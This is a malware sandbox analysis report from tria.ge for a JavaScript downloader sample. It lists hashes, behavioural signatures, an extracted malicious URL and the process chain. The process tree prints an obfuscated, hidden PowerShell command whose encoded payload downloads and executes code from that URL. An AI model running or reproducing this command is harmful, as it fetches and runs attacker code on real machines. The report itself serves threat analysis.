Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24/12/2023, 22:17
Static task
static1
Behavioral task
behavioral1
Sample
1519741ba9983403263247075d88eab9.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
1519741ba9983403263247075d88eab9.js
Resource
win10v2004-20231215-en
General
-
Target
1519741ba9983403263247075d88eab9.js
-
Size
102KB
-
MD5
1519741ba9983403263247075d88eab9
-
SHA1
a786c58039cfc449ba25e06c19629a3da5ce49f8
-
SHA256
e2229194115ad16b8c2c27f2fc36191f8cce4d8c18d8f031b7f03c243ef53928
-
SHA512
33c1be243a0995663145a395edc349df5bf4d293ef33e798baffd4f0cb2599b896d02787c0b6e0cf5b7f3992f15f142c6cc9e9fa80a9ff184137d729841375b8
-
SSDEEP
3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXN:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGQ
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2664 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2664 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2664 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2212 wrote to memory of 1112 2212 wscript.exe 28 PID 2212 wrote to memory of 1112 2212 wscript.exe 28 PID 2212 wrote to memory of 1112 2212 wscript.exe 28 PID 1112 wrote to memory of 2664 1112 cmd.exe 30 PID 1112 wrote to memory of 2664 1112 cmd.exe 30 PID 1112 wrote to memory of 2664 1112 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1519741ba9983403263247075d88eab9.js1⤵
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:1112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-